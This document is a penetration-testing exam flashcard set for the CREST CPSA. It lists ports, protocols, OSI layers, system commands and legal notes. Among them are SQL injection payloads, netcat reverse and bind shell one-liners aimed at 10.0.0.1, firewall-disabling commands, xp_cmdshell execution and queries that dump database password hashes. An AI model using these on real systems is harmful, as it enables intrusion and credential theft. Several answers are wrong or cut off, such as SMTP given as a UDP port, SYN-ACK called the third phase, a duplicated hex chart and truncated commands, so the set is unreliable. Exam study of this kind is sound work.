CREST CPSA New Practice Exam With Accurate Solutions 100% Verified Latest Update
Typology: Exams
iptables - ANSWER A user-space utility program that allows a system administrator to configure the tables provided by the Linux kernel firewall and the chains and rules it stores.
Squid Proxy - ANSWER 3128
Wireshark and TCPdump - ANSWER Common packet analyzers. Allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.
pfSense - ANSWER Open source firewall/router computer software distribution based on FreeBSD.
Benefits of a Penetration Test - ANSWER - Improvement of the management system
Another Structure of a Penetration Test - ANSWER Reconnaissance, Vulnerability Scanning, Investigation, Exploitation
Infrastructure Testing - ANSWER Includes all internal computer systems, associated external devices, internet networking, cloud and virtualization testing.
Types of Infrastructure Testing - ANSWER
- External Infrastructure Penetration Testing
- Internal Infrastructure Penetration Testing
- Cloud and Virtualization Penetration Testing
- Wireless Security Penetration Testing
External Infrastructure Testing - ANSWER Mapping flaws in the external infrastructure
Benefits of External Infrastructure Testing - ANSWER
- Identifies flaws within the firewall configuration that could be misused.
- Finds how information could be leaked out from the system
- Suggests how these issues could be fixed
- Prepares an extensive report on the security risk of the networks and suggests solutions for the same.
- Ensures overall efficiency and productivity of your business.
Benefits of Internal Infrastructure Testing - ANSWER
- Finds out how even a small security weakness can be used by an internal attacker to his advantage
- Finds out the potential business risk and damage that an internal attacker can cause to your business
- Enhances internal infrastructure security systems
- Prepares an inclusive report giving details of the security exposures of internal networks along with the detailed action plan on how to deal with it
Benefits of Cloud and Virtualization Penetration Testing - ANSWER
- Discovers the real risks within the virtual environment and suggests the methods and costs to fix the threats and flaws
- Provides guidelines and an action plan how to resolve the issues
Advantages of Black Box Testing - ANSWER - Test is generally conducted with the perspective of a user, not the designer
paths of a module have been exercised
Computer Misuse Act 1990 Highlights - ANSWER
- Section 1: Unauthorized access to computer material
- Section 2: Unauthorized access with intent to commit or facilitate commission of further offenses
- Section 3: Unauthorized acts with intent to impair, or with recklessness as to impairing the operation of a computer
Human Rights Act 1998 Highlights - ANSWER - The right to life
Consent Information for Penetration Test - ANSWER - Contact Name & Title of person giving consent
Legal Penetration Testing - ANSWER - A statement of intent to be duly signed by both parties
TCP - ANSWER TCP stands for Transmission Control Protocol. It is a main protocol from the Internet protocol suite.
Task of TCP - ANSWER To establish a connection between the client and the server before data can be sent.
User Datagram Protocol - ANSWER Applications that do not require a reliable data stream use User Datagram Protocol.
Responsibility of Internet Protocol - ANSWER Delivering packets from the source host to the destination host with their IP addresses in the packet header.
UDP - ANSWER Yes, UDP is in the Internet protocol suite.
SYN in TCP Handshake - ANSWER The use of SYN is to initiate and establish a connection. It also helps you to synchronize sequence numbers between devices.
UDP handshakes - ANSWER No, UDP does not perform handshakes.
ACK in TCP handshaking - ANSWER Helps to confirm to the other side that it has received the SYN.
SYN-ACK in TCP handshaking - ANSWER SYN-ACK is a SYN message from the local device and ACK of the earlier packet.
FIN - ANSWER Used to terminate the connection.
Three way handshake - ANSWER TCP is known for performing a three way handshake.
SYN - ANSWER SYN means Synchronize.
SYN-ACK phrase - ANSWER SYN-ACK is the third phase after the SYN and ACK phrases of a TCP handshake.
ACK - ANSWER ACK means Acknowledgement.
SYN-ACK - ANSWER SYN-ACK means Synchronize Acknowledgement.
FIN in TCP - ANSWER FIN means Finish.
Port 9100 - ANSWER Jetdirect.
Port 567 - ANSWER DHCPv6 (servers).
Port 593 - ANSWER RPC over HTTPS.
Port 49 - ANSWER TACACS.
TACACS - Terminal Access Control of Authentication and Control Systems.
Port 514 - Syslog.
Port 520 - RIP.
Port 123 - NTP.
Port 500 - Internet Security Association and Key Management Protocol - Key exchange.
Port 587 - SMTP.
UDP port for SMTP - 587.
Port 1521 - Oracle.
Port 6000 - X11.
Port 21 - FTP.
Port 389 - LDAP.
Port 67 - DHCP server.
Port 23 - ANSWER Telnet.
Port 546 - ANSWER DHCPv6 (client).
Port 445 - ANSWER SMB.
Port 161 - ANSWER SNMP.
Port 143 - ANSWER IMAP.
Port 1194 - ANSWER VPN.
Port 1434 - ANSWER MS-SQL (monitoring).
Port 636 - ANSWER LDAPS.
Port 3306 - ANSWER MYSQL.
Port 69 - ANSWER TFTP.
Port 25 - ANSWER SMTP.
Port 53 - ANSWER DNS.
Port 80 - ANSWER HTTP.
Port 139 - ANSWER NETBIOS (session services).
Port 1433 - ANSWER MS-SQL.
Port 2049 - ANSWER NFS, or Network File System.
Port 5060 - ANSWER, this is the Session Initiation Protocol for unencrypted signalling, utilizing TCP/UDP.
Port 3389 - ANSWER RDP or Remote Desktop Protocol.
Port 5222 - ANSWER, this is used for Jabber.
Port 179 - ANSWER, the Border Gateway protocol.
Port 902 - ANSWER, VMWARE.
Port 1080 - ANSWER, this is the SOCKS Proxy.
Dameware - ANSWER, 6129 and 1629.
Port 6667 - ANSWER, this is IRC.
Port 9001 - ANSWER, Tor, HSQL.
Port 9090 - ANSWER, Openfire.
Port 5666 - ANSWER, Nagios.
Port 5432 - ANSWER Postgres.
Service on port 201 - ANSWER AppleTalk.
Nagios - ANSWER An open source system monitoring service.
Postgres - ANSWER An object relational database management system.
X11 - ANSWER A windowing display system for bitmap displays, common on unix-like operating systems.
CDP - ANSWER Cisco Discovery Protocol.
Function of CDP - ANSWER It's a network discovery tool, allows admins to identify neighboring Cisco devices.
CDP default setting - ANSWER Yes, CDP is enabled by default.
DTP - ANSWER Dynamic Trunking Protocol.
HSRP - ANSWER Hot Standby Router Protocol.
VTP - ANSWER Protocol that propagates the definition of VLANs on the whole local area network.
Hot Standby Router Protocol - ANSWER A network protocol that provides redundancy for routers.
Symmetric Encryption - ANSWER Only one key is used to both encrypt and decrypt electronic information.
Asymmetric Encryption - ANSWER There is a public key to encrypt and a private key to decrypt.
Block Algorithm - ANSWER An algorithm that encrypts information in blocks.
Yersinia - ANSWER A Layer 2 Testing Tool.
OSI Layer 7 - ANSWER Application Layer.
OSI Layer 5 - ANSWER Session Layer.
OSI Layer 3 - ANSWER Network Layer.
OSI Layer 1 - ANSWER Physical Layer.
OSI Layer 2 - ANSWER Data Link Layer.
OSI Layer 4 - ANSWER Transport Layer.
OSI Layer 6 - ANSWER Presentation Layer.
CDP Advantages - ANSWER Finds out about neighbouring devices and their configuration, can discover routers or switches that are incorrectly configured, helps in troubleshooting.
Layer 4 Function - ANSWER Send data across using the TCP and UDP protocols.
Layer 7 Function - ANSWER Applications have access to the network services.
Layer 1 Function - ANSWER Transmits raw bitstream across the physical medium.
Layer 6 Function - ANSWER Ensures that data is in a usable format and is where data encryption occurs.
Layer 5 Function - ANSWER Maintains connections and is responsible for controlling ports and sessions.
Layer 2 Function - ANSWER Defines the format of data on the network.
Layer 3 Function - ANSWER Decides which physical path the data will take.
TCP Port 1 - ANSWER TCP Port Service Multiplexer (TCPMUX).
TCP Port 5 - ANSWER Remote Job Entry (RJE).
TCP Port 7 - ANSWER ECHO or ICMP.
TCP Port 18 - ANSWER Message Send Protocol (MSP).
TCP Port 29 - ANSWER MSG ICP.
TCP Port 37 - ANSWER Time Protocol.
TCP Port 42 - ANSWER Host Name Server (Nameserv).
TCP Port 43 - ANSWER WHOIS.
TCP Port 70 - ANSWER Gopher Services.
TCP Port 79 - ANSWER Finger.
TCP Port 103 - ANSWER X.400 Standard.
TCP Port 159 - ANSWER SQL Server.
TCP Port 190 - ANSWER Gateway Access Control Protocol (GACP).
TCP Port 118 - ANSWER SQL Services.
TCP Port 197 - ANSWER Directory Location Service (DLS).
TCP Port 398 - ANSWER Novell Netware over IP.
TCP Port 119 - ANSWER NNTP (Network News Transfer Protocol) Newsgroup.
TCP Port 444 - ANSWER Simple Network Paging Protocol (SNPP).
TCP Port 453 - ANSWER Apple Quicktime.
TCP Port 500 - ANSWER IKE Internet Key Exchange.
TCP/IP Model Mnemonic - ANSWER Never Ingest Turian Almonds.
CAT5 - ANSWER CAT5 category 5 cable is a twisted pair cable for computer networking.
10/100/1000baseT - ANSWER An Ethernet standard developed by the Institute of Electrical and Electronics Engineers (IEEE).
Token Ring - ANSWER A data link for a local area network (LAN) in which all stations are connected in a ring or star topology.
Wireless (802.11) - ANSWER The IEEE 802.11 is a standard employed for wireless Ethernet networks.
LM Hash - ANSWER Primary Windows LAN hash prior to Windows NT with 14 character limit.
DES Encryption - ANSWER A 64 bit block cipher that has five modes of operation, repeated 16 times for each encryption/decryption operation.
3DES Encryption - ANSWER 168 bit key encryption (48 cycles).
TTL for Windows - ANSWER 128.
TTL for Linux - ANSWER 64.
TTL (Time to Live) - ANSWER Indicates the maximum time that an IPv4 packet can reside on the network before being discarded.
Cisco Password Encryption - ANSWER Various including secret 4: Crappy SHA256, secret 5: Salted MD5.
SIP Requests - ANSWER INVITE, ACK, BYE, CANCEL, OPTIONS, REGISTER, PRACK, SUBSCRIBE, NOTIFY, PUBLISH, INFO, REFER, MESSAGE, UPDATE.
SMTP Requests - ANSWER MAIL, RCPT, DATA.
SNMP Requests - ANSWER Get, GetNext, Set, GetBulk, Response, Trap, Inform.
HTTP Status Codes - ANSWER 1xx - Info, 2xx - Success, 3xx - Redirection, 4xx - Error, 5xx - Server Error.
HTTP Status Code 404 - ANSWER NOT FOUND the method is not available.
HTTP Status Code 302 - ANSWER Temporarily Moved.
HTTP Status Code 301 - ANSWER Moved Permanently.
HTTP Status Code 410 - ANSWER Gone.
SQL Injection (Escape Characters) - ANSWER ' OR '1' = '1' --.
SQL Injections (Type Handling) - ANSWER 1; DROP TABLE users.
Linux File Permissions - ANSWER drwxrwxrwx 2 user(owner) group size date filename.
Linux Command: Change Password - ANSWER passwd
/bin - ANSWER User Binaries
/boot - ANSWER Bootup related files
/dev - ANSWER Interface for system devices
/etc - ANSWER System Config Files
/home - ANSWER Base directory for user files
/lib - ANSWER Critical software libraries
/opt - ANSWER Third party software
/proc - ANSWER System and running processes
/root - ANSWER Home for root
/sbin - ANSWER Sys Admin binaries
/tmp - ANSWER Temporary Files
/usr - ANSWER Less critical files
/var - ANSWER Variable system files
prstat -a - ANSWER Solaris Command: Process Listing.
svcs -a - ANSWER Solaris Command: Services and Status.
svcadm start
Windows NT 5.2 Versions - ANSWER Windows XP (64 bit, Pro 64 bit), Windows Server 2003 and R2, Windows Home Server.
Windows NT 6.0 Versions - ANSWER Windows Vista (ALL), Windows Server 2008 (Foundation, Standard, Enterprise).
Windows NT 6.1 Versions - ANSWER Windows 7 (ALL), Windows Server 2008 R2 (ALL).
Windows NT 6.2 Versions - ANSWER Windows 8, Windows Phone 8, Windows Server 2012.
Windows NT 10 versions - ANSWER Windows 10, Windows Server 2016, Windows Server 2019, Windows Server 2022, Windows 11.
%SYSTEMDRIVE%\boot.ini - ANSWER Contains the boot options for computers with BIOS firmware running NT-based operating system prior to Windows Vista.
%SYSTEMROOT%\repair\SAM - ANSWER Stores Windows users' passwords in a hashed format, in LM hash and NTLM hash. These are backups of C:\windows\system32\config\SAM.
Windows Commands: System Info - ANSWER ver : OSVersion, sc query state=all : Services, tasklist /svc : Processes and Services, echo %USERNAME% : Current user.
Windows Command: Find Files of Type - ANSWER dir /a /s /n c:\*.pdf.
Windows Commands: Add User, Make Admin - ANSWER net user
Linux Command: Add User, Make Sudoer - ANSWER useradd
Command: View Network Info - ANSWER Linux: ifconfig, Windows: ipconfig /all.
Command: Display File Contents - ANSWER Linux:
IIS 1 Defaults - ANSWER Windows NT Addon.
IIS 4 Defaults - ANSWER NT4 Option Pack.
IIS 5 Defaults - ANSWER Windows 2000.
IIS 2 Defaults - ANSWER NT 4.0.
IIS 5.1 Defaults - ANSWER Windows XP.
IIS 3 Defaults - ANSWER NT 4 Service Pack.
IIS 6 Defaults - ANSWER Windows Server 2003, Windows XP Pro.
IIS 7 Defaults - ANSWER Windows Vista, Server 2008.
IIS 7.5 Defaults - ANSWER Windows 7, 2008 R2.
IIS 8 Defaults - ANSWER Windows Server 2012, Windows 8.
IIS 8.5 Defaults - ANSWER Windows Server 2012 R2, Windows 8.1.
IIS 10 v 1607 Defaults - ANSWER Windows Server 2016, Windows 10 Anniversary Update.
IIS 10 v 1709 Defaults - ANSWER Windows 10 Fall Creators, v1709.
IIS 10 v 1809 Defaults - ANSWER Windows Server 2019, Windows 10 October Update.
Windows Command: Disable Firewall - ANSWER netsh advfirewall set currentprofile state off, netsh advfirewall set allprofiles state off.
Sysinternals Suite - ANSWER A suite of very powerful Windows administration applications to view, troubleshoot and edit Windows functions.
WMIC - ANSWER Windows Management Instrumentation Command-Line.
WMIC Command: Execute Process - ANSWER wmic process call create "process_name".
WMIC Command: Uninstall Software - ANSWER wmic product where name="XX" call uninstall /nointeractive.
PCI Card Info Storage Common-Use - ANSWER
- Store card details (i.e. CC number, expiry) in encrypted form
- Store cardholder details (name, address, contact details, i.e. PII) in a SEPARATE encrypted database with a unique reference identifier linking the two
- DO NOT STORE sensitive data (i.e. CVV2, CVV or CID values).
Windows: Active Directory Default Location - ANSWER C:\Windows\NTDS.
Windows: Domain Common Folders - ANSWER C:\Windows\SYSVOL.
dsquery - ANSWER Remote Server Administration Tools (RSAT) feature pack tool used to enumerate Windows Domain.
Classful IP Range: Class A - ANSWER 128 Networks (2^7), 16,777,216 Addresses per network (2^24).
Classful IP Range: Class B - ANSWER 16,384 Networks (2^14), 65,536 Addresses per network (2^16).
Classful IP Range: Class C - ANSWER 2,097,152 Networks (2^21), 256 Addresses per network (2^8).
Classful IP Range Calculation - ANSWER If first bit is "0", it's a class A address. If second bit is a "0", it's class B address. If third bit is a "0", it's class C address. If the fourth bit is "0", it's class D address. If it's "1", then it's class E address.
Classless Subnets / CIDR - ANSWER Class C - 255.255.255.0, /24 (254 Hosts), Class B - 255.255.0.0, /16 (65,534 Hosts), Class A - 255.0.0.0, /8 (16,777,214 Hosts).
Hexadecimal Chart - ANSWER 0, 1, 2, 3, 4, 5, 5, 6, 7, 8, 9, 10 - A, 11 - B, 12 - C, 13 - D, 14 - E, 15 - F.
VLAN - ANSWER A logically segmented switched network, segmented by function, project team, or application, without regard to the physical locations of the users.
VLAN IDs 1002-1005 - ANSWER Token Ring and FDDI VLANs
VLAN IDs greater than 1005 - ANSWER Extended-range VLANs (not stored in the VLAN database)
VLAN IDs 1-1005 - ANSWER Normal-range VLANs
vlan.dat - ANSWER Configurations for VLAN IDs 1-1005
GLBA - ANSWER Gramm-Leach-Bliley Act.
Gramm-Leach-Bliley Act of 1999 - ANSWER Require financial institutions to protect customer data in order to safeguard the security and confidentiality.
GDPR - ANSWER General Data Protection Regulation.
FERPA - ANSWER Family Educational Rights and Privacy Act.
PCI DSS - ANSWER Payment Card Industry Data Security Standard.
Basel Accord - ANSWER An agreement that required banks to hold as capital at least 8% of their risk-weighted assets.
ISO 27000 Series - ANSWER A series containing a range of individual standards and documents specifically reserved by ISO for information security.
COBIT - ANSWER Control Objectives for Information and Related Technology.
IPv4 - ANSWER The Internet Protocol version 4 is the dominant protocol for routing traffic on the Internet, specifying 'to' and 'from' addresses using a dotted decimal such as '122.45.255.0'.
Cat 5 - ANSWER Category 5 wire, a TIA/EIA standard for UTP wiring that can operate at up to 100 Mbps.
TTL - ANSWER Time to Live.
CSMA/CA - ANSWER Carrier Sense Multiple Access with Collision Avoidance.
CDMA - ANSWER Code Division Multiple Access (GSM competitor).
Netcat: Start Listener to Catch Shell - ANSWER Linux: nc 10.0.0.1 1234 -e /bin/sh; Windows: nc 10.0.0.1 1234 -e cmd.exe (-e is execute and is not always supported)
Netcat: Listen - ANSWER nc -nlvp
Netcat: Bind Shell - ANSWER Listener: nc -nlvp 4444 -e cmd.exe; Sender/ 'Talker': nc -nv IP to connect to 4444
Netcat: Reverse Shell - ANSWER Listener: nc -nlvp 4444; Sender: nc -nv IP to send to 4444 /bin/bash (sends shell!)
NMap: Scan Types - ANSWER -sP : ping scan; -sS : syn scan ('half open' scan); -sT : connect scan (full TCP); -sU : UDP scan; -sO : protocol scan
Port Count 65,536 - ANSWER 2^16 Ports; Applies to TCP AND UDP
NMap: Scan EVERY Port - ANSWER TCP: nmap -p- ; UDP: nmap -sU -p-
NMap: Common Options - ANSWER -p1-65535 : Ports; -T[0-5] : 'Scan Speed', can help hide you; -n : No DNS Resolution; -O : OS Detection; -A : AGGRESSIVE; -sV : Version Detection; -PN : No Ping; -6 : IPv6 Scan; -oA
IIS - ANSWER Microsoft Web Server
Apache / Tomcat - ANSWER Apache Web Servers
GWS - ANSWER Google Web Server
WebSphere - ANSWER IBM Web Server
MS-SQL: DB Version - ANSWER SELECT @@version; EXEC xp_msver (detailed version info)
MS-SQL: Run OS Command - ANSWER EXEC master.xp_cmdshell 'net user'
MS-SQL: SELECT commands - ANSWER
- SELECT HOST_NAME( ) : Hostname and IP
- SELECT DB_NAME ( ) : Current DB
- SELECT name FROM master.sysdatabases; : List DBs
- SELECT user_name ( ) : Current user
- SELECT name FROM master.syslogins : List users
- SELECT name FROM master.sysobjects WHERE xtype='U'; : List Tables
- SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name='mytable'); : List columns
MS-SQL: List all Tables and Columns - ANSWER SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable')
MS-SQL: System Table (Info on All Tables) - ANSWER SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
MS-SQL 2005 Vulnerability (Password Hashes) - ANSWER SELECT name, password_hash FROM master.sys.sql_logins
Postgres: SELECT statements - ANSWER
- SELECT version(); : DB Version
- SELECT inet_server_addr(); : Hostname and IP
- SELECT current_database(); : Current DB
- SELECT datname FROM pg_database; : List DBs
- SELECT user; : Current user
- SELECT username FROM pg_user; : List Users
- SELECT username,passwd FROM pg_shadow : List password hashes
MySQL Default Credentials - ANSWER root | MYSQL
MySQL: SELECT Commands - ANSWER
- SELECT @@version; : DB Version
- SELECT @@hostname; : Hostname and IP
- SELECT database(); : Current DB
- SELECT distinct (db) FROM mysql.db; : List DBs
- SELECT user(); : Current user
- SELECT user FROM mysql.user; : List Users
- SELECT host,user,password FROM mysql.user; : List password hashes